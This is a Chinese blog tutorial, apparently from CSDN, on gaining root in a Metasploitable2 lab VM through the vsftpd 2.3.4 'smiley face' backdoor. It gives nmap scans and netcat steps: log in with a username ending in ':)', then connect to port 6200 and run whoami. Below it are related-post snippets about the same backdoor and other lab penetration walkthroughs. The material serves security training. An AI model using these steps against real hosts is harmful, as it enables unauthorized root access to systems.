使用kali-linux通过笑脸漏洞获取目标靶机最高权限

最新推荐文章于 2023-11-06 21:07:56 发布
最新推荐文章于 2023-11-06 21:07:56 发布
阅读量4.4k 收藏 16
点赞数
文章标签: linux 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51650968/article/details/121129326
版权

使用kali-linux通过笑脸漏洞获取目标靶机最高权限

1,首先启动并登陆一个充满漏洞的靶机Metasploitable2 (Linux)

登陆账号密码都默认为:msfadmin

请添加图片描述

进去之后了解靶机的ip地址

通过nmap对靶机ip地址进行扫描

请添加图片描述

我们可以发现21端口是打开的

我们尝试扫描该端口的版本

请添加图片描述

如图这正是有笑脸漏洞的vsftpd的版本、

查看6200端口情况

请添加图片描述

我们可以看到第一次用nmap 对6200端口扫描时

该端口是封闭的

连接21端口并通过笑脸漏洞登录

请添加图片描述

打开一个新的控制台

使用指令 nc ip 21 连接端口

然后输入 user x:) 回车

再输入pass 任意

再次在另外一个控制台扫描6200端口

请添加图片描述

如图显示已经打开

在控制台连接6200端口

使用指令 nc ip 6200

输入whoami并回车

打开

在控制台连接6200端口

使用指令 nc ip 6200

输入whoami并回车

显示自己的权限为root

北马里亚纳群岛
关注
  • 0
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机笑脸漏洞
qq_58018041的博客
04-22 3602
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
Linux-Metasploit 渗透-魔鬼教程
m0_74025111的博客
04-20 2899
这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞,换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。进行专业的渗透测试后,即使是系统未被攻破,也可以证明先前实行的防御是有效的,专业的渗透测试可以有效评估系统的安全状况,并提出合理的改进方案。用方法 -p 端口号) -sV 扫描服务器版本。
kali渗透测试之远程控制:通过激活靶机Metasploitable 2中的笑脸漏洞使其开启6200端口进行远程控制
m0_64128402的博客
11-06 755
kali渗透测试远程控制之6200端口变成了“后门”
利用Kali和NATAPP实现远程控制靶机(仅供学习使用)
qq_51367009的博客
06-19 1612
MetasploitFramework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新 Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。...
利用Kali 完成一次简单的渗透
热门推荐
qq_50905066的博客
03-20 3万+
这里我们需要两台虚拟机。一台Kali 作为攻击机,一台Ubuntu作为靶机。 如图: 渗透的话我们需要先得到靶机的ip 地址才能进行扫描。因为是虚拟机,只要我们知道了Kali 的ip 的地址,扫描其所在网段就可以获得靶机的地址了。 如图: 通过使用Kali自带的扫描工具执行Namp -sP 192.168.161.1/24就可以扫到了。这里我们排出太小的地址和太大的地址以及攻击的地址就可以确定靶机的地址了。 在得到靶机的地址之后,我们就可以进一步扫描靶机端口,从其中获得靶机开启的端口和..
Kali渗透DC:6
qq_50905066的博客
03-29 558
与前面相同,在官网下载靶机,修改网卡为nat启动靶机,同时启动Kali使用Namp扫描主机 发现靶机地址,通过靶机地址扫描靶机系统与靶机开启的端口及服务 发现靶机开启了ssh服务22端口http服务80端口使用浏览器访问靶机http服务 发现浏览器无法找不到该地址,尝试给本机添加路由后再次访问 成功访问并发现该浏览器有Wordpress搭建,没有搜集到其他信息,我们尝试使用drib扫描网站目录 发现有常见的账户参数,用浏览器打开 成功找到登录界面,有了登录...
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
kali-linux-2023.3-vmware-amd64.part2.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Kali系统渗透靶机(物理机)的详细过程
哆啦A梦
03-21 6221
Kali系统渗透靶机
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 4106
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
基于笑脸漏洞靶机渗透
qq_56472016的博客
11-03 663
一 打开我们的kali虚拟机,并打开我们的被渗透的靶机。 二 我们在虚拟机上登录后用ifconfig指令查看靶机的ip地址 得到的地址为192.168.159.129. 三 在kali上打开一个终端,用su root指令后输入root的登录密码,进入root模式,方便我们运用一些指令。 四 我们使用nmap指令,查看靶机端口开放情况 我们发现靶机的21端口是打开的,再使用nmap -p 查看靶机6200端口,发现6200端口是关闭的。 五 这时...
VSFTPD笑脸漏洞手工测试
rrorb的博客
11-06 2616
VSFTPD v2.3.4版本存在一个著名的笑脸漏洞,也称为后门,即用户名中存在“:)”标志的用户可以通过后门获得访问权限,今天我们来实际操作如何利用笑脸漏洞获得访问权限。 首先开启kali虚拟机,并确保靶机开启确保网络连通性。 用ifconfig命令查看kali虚拟机的IP和靶机的IP kali:192.168.5.255 使用nmap扫描靶机及其端口输入命令nmap 192.168.5.0/24回车扫描, 可以看到靶机metasploitable2 IP:192.168.5.129, 并.
vsftpd2.3.4笑脸漏洞
weixin_51909453的博客
11-02 4823
vsftpd2.3.4笑脸漏洞 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口6200 。 1、靶机metasploitable2,默认登录账号和密码都是:msfadmin,登录成功后ifconfig查看靶机ip192.168.179.129 2、打开kali首先输入sudo su ,输入当前用户密码即可切换root,利用nmap -sV 192.168.
模拟渗透测试——使用metasploit与wget获取靶机shell
mirocky的博客
01-19 1474
前言 近日在复现漏洞时,由于目标所提供的服务中的某段代码没有对权限进行检查,导致了远程命令执行——RCE漏洞。 由于该漏洞本身的特性,所能执行的命令是需要通过url进行拼接且每次只可执行一句,因此尝试获取靶机shell来做到更多的事。 但在尝试的过程中发现目标对于防渗透措施做的相当不错,删除或者禁用了很多命令,上篇文章(《反弹shell常用命令》)所提到的所有方式都没有尝试成功。但天无绝人之路,busybox中wget的身影吸引了我的注意。 环境准备 靶机:ubuntu 192.168.116.128 攻击
笑脸漏洞(VSFTPD2.3.4)复现
aarong的博客
11-01 8219
笑脸漏洞(VSFTPD2.3.4)复现 漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。 攻击机:kali linux 靶机:Metasploitable2 复现过程 Nmap扫描同网断的靶机,观察靶机上的服务开放情况: nmap 192.168.43.0/24 发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4
笑脸漏洞—的简单操作
qq_53639387的博客
11-11 2514
1.首先我们需要在我们的虚拟机上安装Metasploitable2虚拟系统。 进去的虚拟系统启动之后,使用用户名msfadmin,和密码msfadmin登陆 2.接下来我们需要查看IP地址,使用ifconfig命令执行 3.知道了靶机上IP,接下来在kali端打开Metasploitable2,使用nmap 靶机IP地址扫描 4. ...
wsl --install -d kali-linuxkali-linux d:\WSL\kali.tar
最新发布
06-11
3. 使用提供的命令 `wsl --install -d D:\WSL\kali.tar` 或者 `wsl --install -d kali-linux`(如果`.tar` 文件直接放在了指定路径)。 4. 运行该命令后,Windows会自动解压并安装Kali Linux到WSL环境中。 5. 安装...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值